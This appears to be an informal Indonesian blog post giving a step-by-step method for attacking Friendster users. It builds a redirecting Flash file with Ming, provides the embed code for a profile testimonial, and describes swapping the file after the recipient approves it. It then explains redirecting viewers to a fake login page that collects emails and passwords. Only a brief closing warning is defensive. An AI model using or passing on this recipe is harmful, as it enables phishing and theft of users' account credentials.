Teman – teman saya ingin bilang sesuatu sama kalian semua, jangan anda pikir friendster adalah salah satu web yang paling aman di dunia ini, atau anda mau mengatakan kalau friendster juga adalah web yang paling berhasil di gunakan. Sebenarnya kerahasian friendster adalah sebuah web yang sangat mudah atau gampang sekali untuk di bobol oleh para cracker ( Underground ).

Contohnya saja di mana kita bisa memasang sebuah script di dalam friendster seperti friendster overlay, scritp, dll. Dan yang paling parah adalah di mana kita bisa nge hack sesama penguna friendster yang ada di seluruh dunia. Apabila anda yang sudah mahir dalam friendster ( kebanyakan abg yang kerjanya sisain uang jajan hanya untuk ke warnet buka fs, masuk tempat layout, nicespace, dll ) jangan pernah mengangap kalau friendster anda adalah yang paling aman dan paling keren. Sebenarnya masih ada beberapa friendster yang lebih keren dari pada yang kalian punya.

Sekarang gue mau kasih masukan sama kalian cara dan anti sipasi meng hack friendster orang…

Pertama kita buat script flash sederhana seperti kode dibawah ini. Untuk yang menggunakan linux, install Ming package terlebih dahulu. Ming adalah library yang dapat menghasilkan file Macromedia Flash (.swf). Jika anda menggunakan ubuntu dan belum menginstall, jalankan perintah berikut :

apt-get install libming-util

Jika Ming berhasil diinstal, buat sebuah file dengan editor anda yang berisi kode berikut dan simpan dengan nama flash.as :

getURL("http://www.contoh.com");

misalkan seperti berikut :

getURL("http://chaidir.wordpress.com");

Setelah itu buat file flash (.swf) dengan menjalankan perintah berikut :

chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as

Jika berhasil, maka akan dihasilkan file Flash bernama out.swf. File ini ketika diakses dari browser, akan me-redirect ke URL yang kita definisikan sebelumnya. Contohnya silahkan akses flash yang telah saya buat disini. Apabila anda mengakses url tersebut, maka anda langsung ‘diarahkan’ menuju http://chaidir.wordpress.com.

Selanjutnya upload file flash tadi (out.swf) ke tempat yang mudah diakses. Misalkan di http://numpang.com/out.swf. Setelah itu, kirim testimonial ke orang yang ingin di berikan testimonial dengan memasukkan file flash ini.

Jangan mengirimkan testimonial ini keteman anda, karena profile teman anda tidak akan bisa diakses!

Caranya masukkan kode berikut :


<object classid=’clsid:D27CDB6E-AE6D-11cf-96B8-444553540000′ codebase=’http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0′ width=’400′ height=’250′><param name=’movie’ value=’http://numpang.com/out.swf‘ /><param name=’quality’ value=’high’ /><embed src=’http://numpang.com/out.swf‘ quality=’high’ pluginspage=’http://www.macromedia.com/go/getflashplayer’ type=’application/x-shockwave-flash’ width=’400′ height=’250′ allowScriptAccess=”never”></embed></object>

Untuk mencoba apakah testimonial ini berhasil, klik priview. Agar sang penerima testimonial bisa meng-approve testimonial, hapus ganti file flash tadi terlebih dahulu (http://numpang.com/out.swf) dengan flash animasi yang menarik perhatian. Misalnya dengan flash dari Babaflash Forum. Baru setelah di approve, aktifkan ganti lagi (upload lagi) dengan file flash tadi.

Nah, dalam contoh kasus di Friendster palsu, sang cracker me-redirect setiap user yang ingin melihat profile yang sudah disusupi flash tadi dan mengarahkannya ke http://www.friendster.co.nr. Dan celakanya disitu dibuat halaman yang menyerupai halaman login Friendster dan seolah-olah terjadi kesalahan yang mengharuskan setiap user memasukkan email dan passwordnya.

‘Fasilitas’ untuk mengirimkan testimonial di Friendster inilah yang dimanfaatkan cracker untuk ‘mengelabuhi’ orang-orang yang sering bermain-main dengan Friendster. Oleh karena itu, berhati-hatilah terhadap testimonial yang menggunakan flash. Jika mendapatkan testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash yang ngga penting, lebih baik tidak usah di approve aja.